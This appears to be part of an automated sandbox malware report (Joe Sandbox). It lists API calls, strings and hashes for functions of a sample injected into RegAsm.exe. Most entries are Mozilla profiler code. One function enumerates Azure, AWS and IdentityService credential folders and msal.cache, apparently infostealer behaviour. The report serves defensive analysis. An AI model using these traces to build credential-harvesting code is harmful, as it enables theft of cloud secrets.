                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    Strings
                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC44812
                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC44828
                                                                                    • MOZ_PROFILER_SHUTDOWN, xrefs: 6CC44A42
                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC447FC
                                                                                    • [I %d/%d] profiler_shutdown, xrefs: 6CC44A06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                    • API String ID: 1340022502-4194431170
                                                                                    • Opcode ID: c3381fb728d657a909445ee7a91afa5542c2f4a8981e1473ae35045f146566d2
                                                                                    • Instruction ID: 4528e45bac91a3110eb68051d6cd8346714f0730e06b1cc446e58ced7b74a6d5
                                                                                    • Opcode Fuzzy Hash: c3381fb728d657a909445ee7a91afa5542c2f4a8981e1473ae35045f146566d2
                                                                                    • Instruction Fuzzy Hash: B881F479A001008FDB00DFA9D89475A7775FF42328F24C629E916A7F41F731E895CBAA
                                                                                    Function 6CC44470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC44730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC444B2,6CCBE21C,6CCBF7F8), ref: 6CC4473E
                                                                                      • Part of subcall function 6CC44730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC4474A
                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CC444BA
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CC444D2
                                                                                    • InitOnceExecuteOnce.KERNEL32(6CCBF80C,6CC3F240,?,?), ref: 6CC4451A
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC4455C
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6CC44592
                                                                                    • InitializeCriticalSection.KERNEL32(6CCBF770), ref: 6CC445A2
                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6CC445AA
                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6CC445BB
                                                                                    • InitOnceExecuteOnce.KERNEL32(6CCBF818,6CC3F240,?,?), ref: 6CC44612
                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC44636
                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6CC44644
                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC4466D
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC4469F
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC446AB
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC446B2
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC446B9
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC446C0
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC446CD
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6CC446F1
                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CC446FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                    • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                    • API String ID: 1702738223-3894940629
                                                                                    • Opcode ID: c4df8e3795961a23628eba3a7e3a71347c9e7869bfcf190ca36711acefcf5791
                                                                                    • Instruction ID: 3e7a6c8b30bb29a77aa085271ec200a7b4c2a48b054c0c8ccb6636e1dfa86017
                                                                                    • Opcode Fuzzy Hash: c4df8e3795961a23628eba3a7e3a71347c9e7869bfcf190ca36711acefcf5791
                                                                                    • Instruction Fuzzy Hash: 2B6113B8A00248AFEB00CFE1CC49B957BB8EB46308F24C598E904AB751F7B19945CF55
                                                                                    Function 6CC7E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC77090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6CC7B9F1,?), ref: 6CC77107
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CC7DCF5), ref: 6CC7E92D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EA4F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EA5C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EA80
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EA8A
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CC7DCF5), ref: 6CC7EA92
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EB11
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EB1E
                                                                                    • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6CC7EB3C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EB5B
                                                                                      • Part of subcall function 6CC75710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC7EB71), ref: 6CC757AB
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EBA4
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6CC7EBAC
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EBC1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000), ref: 6CC7EBCE
                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6CC7EBE5
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,00000000), ref: 6CC7EC37
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7EC46
                                                                                    • CloseHandle.KERNEL32(?), ref: 6CC7EC55
                                                                                    • free.MOZGLUE(00000000), ref: 6CC7EC5C
                                                                                    Strings
                                                                                    • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6CC7EA9B
                                                                                    • [I %d/%d] profiler_start, xrefs: 6CC7EBB4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                    • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                    • API String ID: 1341148965-1186885292
                                                                                    • Opcode ID: 92d745192a95e8bd1fec2b9da9d20eb111715bd3dbeffab84c153ca0725b3bf2
                                                                                    • Instruction ID: b960cb37aa5d12f64546b49e9ebe4fd28ef9813aa94d18133e6ad8fc90e20c31
                                                                                    • Opcode Fuzzy Hash: 92d745192a95e8bd1fec2b9da9d20eb111715bd3dbeffab84c153ca0725b3bf2
                                                                                    • Instruction Fuzzy Hash: FCA1373A7006148FDB109FA8C494BAABBB5FF86318F14402DE91997F51FB709845CBB5
                                                                                    Function 6CC7F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F70E
                                                                                    • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC7F8F9
                                                                                      • Part of subcall function 6CC46390: GetCurrentThreadId.KERNEL32 ref: 6CC463D0
                                                                                      • Part of subcall function 6CC46390: AcquireSRWLockExclusive.KERNEL32 ref: 6CC463DF
                                                                                      • Part of subcall function 6CC46390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC4640E
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F93A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F98A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F990
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F994
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F716
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                      • Part of subcall function 6CC3B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC3B5E0
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F739
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F746
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F793
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCB385B,00000002,?,?,?,?,?), ref: 6CC7F829
                                                                                    • free.MOZGLUE(?,?,00000000,?), ref: 6CC7F84C
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CC7F866
                                                                                    • free.MOZGLUE(?), ref: 6CC7FA0C
                                                                                      • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC45E8C
                                                                                      • Part of subcall function 6CC45E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45E9D
                                                                                      • Part of subcall function 6CC45E60: GetCurrentThreadId.KERNEL32 ref: 6CC45EAB
                                                                                      • Part of subcall function 6CC45E60: GetCurrentThreadId.KERNEL32 ref: 6CC45EB8
                                                                                      • Part of subcall function 6CC45E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45ECF
                                                                                      • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CC45F27
                                                                                      • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CC45F47
                                                                                      • Part of subcall function 6CC45E60: GetCurrentProcess.KERNEL32 ref: 6CC45F53
                                                                                      • Part of subcall function 6CC45E60: GetCurrentThread.KERNEL32 ref: 6CC45F5C
                                                                                      • Part of subcall function 6CC45E60: GetCurrentProcess.KERNEL32 ref: 6CC45F66
                                                                                      • Part of subcall function 6CC45E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC45F7E
                                                                                    • free.MOZGLUE(?), ref: 6CC7F9C5
                                                                                    • free.MOZGLUE(?), ref: 6CC7F9DA
                                                                                    Strings
                                                                                    • " attempted to re-register as ", xrefs: 6CC7F858
                                                                                    • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CC7F9A6
                                                                                    • Thread , xrefs: 6CC7F789
                                                                                    • [D %d/%d] profiler_register_thread(%s), xrefs: 6CC7F71F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                    • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                    • API String ID: 882766088-1834255612
                                                                                    • Opcode ID: c66a9351c0306b8c0f8c4c1117e93bd22392f4005b919855b4b4c0a71354169d
                                                                                    • Instruction ID: ef62768611038c41c543cf344f1f53f6099619e0f22c236f2ac275540298683b
                                                                                    • Opcode Fuzzy Hash: c66a9351c0306b8c0f8c4c1117e93bd22392f4005b919855b4b4c0a71354169d
                                                                                    • Instruction Fuzzy Hash: 3D8113756046009FDB21DF64C880AAEB7B5FF85308F45852DE8499BB51FB31E849CBA2
                                                                                    Function 00416791 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 135stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00416796
                                                                                    • memset.MSVCRT ref: 004167B6
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                    • lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                      • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                    • memset.MSVCRT ref: 00416834
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                    • lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                    • memset.MSVCRT ref: 004168B7
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 004168E2
                                                                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004168FF
                                                                                      • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                      • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                    • memset.MSVCRT ref: 0041693A
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                    • API String ID: 2836893066-974132213
                                                                                    • Opcode ID: c58c534d700d359848532d575c73dd31abfa58791d620c81c5a56ac48601855f
                                                                                    • Instruction ID: 745e3daf2a537ab21df9589d501c2eabb87bb30e3b6ddd2dcbe1be6b1c91b76e
                                                                                    • Opcode Fuzzy Hash: c58c534d700d359848532d575c73dd31abfa58791d620c81c5a56ac48601855f
                                                                                    • Instruction Fuzzy Hash: 6B4195B1D0022CBADB11E7E4DC46EED777CAB1C704F40056FB554A3182DA7C97888B65
                                                                                    Function 6CC7EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EE60
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EE6D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EE92
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7EEA5
                                                                                    • CloseHandle.KERNEL32(?), ref: 6CC7EEB4
                                                                                    • free.MOZGLUE(00000000), ref: 6CC7EEBB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EEC7
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7EECF
                                                                                      • Part of subcall function 6CC7DE60: GetCurrentThreadId.KERNEL32 ref: 6CC7DE73
                                                                                      • Part of subcall function 6CC7DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC44A68), ref: 6CC7DE7B
                                                                                      • Part of subcall function 6CC7DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC44A68), ref: 6CC7DEB8
                                                                                      • Part of subcall function 6CC7DE60: free.MOZGLUE(00000000,?,6CC44A68), ref: 6CC7DEFE
                                                                                      • Part of subcall function 6CC7DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC7DF38
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EF1E
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EF2B
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EF59
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EFB0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EFBD
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EFE1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EFF8
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F000
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F02F
                                                                                      • Part of subcall function 6CC7F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7F09B
                                                                                      • Part of subcall function 6CC7F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC7F0AC
                                                                                      • Part of subcall function 6CC7F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC7F0BE
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause, xrefs: 6CC7F008
                                                                                    • [I %d/%d] profiler_stop, xrefs: 6CC7EED7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                    • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                    • API String ID: 16519850-1833026159
                                                                                    • Opcode ID: 5483e2aab6c3eab869ae772fb9327020999dd2a733a07ac593c55c44745bd969
                                                                                    • Instruction ID: 87cc19eaa7ff1862e149d7e13b61f96da5ddd9fa91974ee0a6cb559ff2303005
                                                                                    • Opcode Fuzzy Hash: 5483e2aab6c3eab869ae772fb9327020999dd2a733a07ac593c55c44745bd969
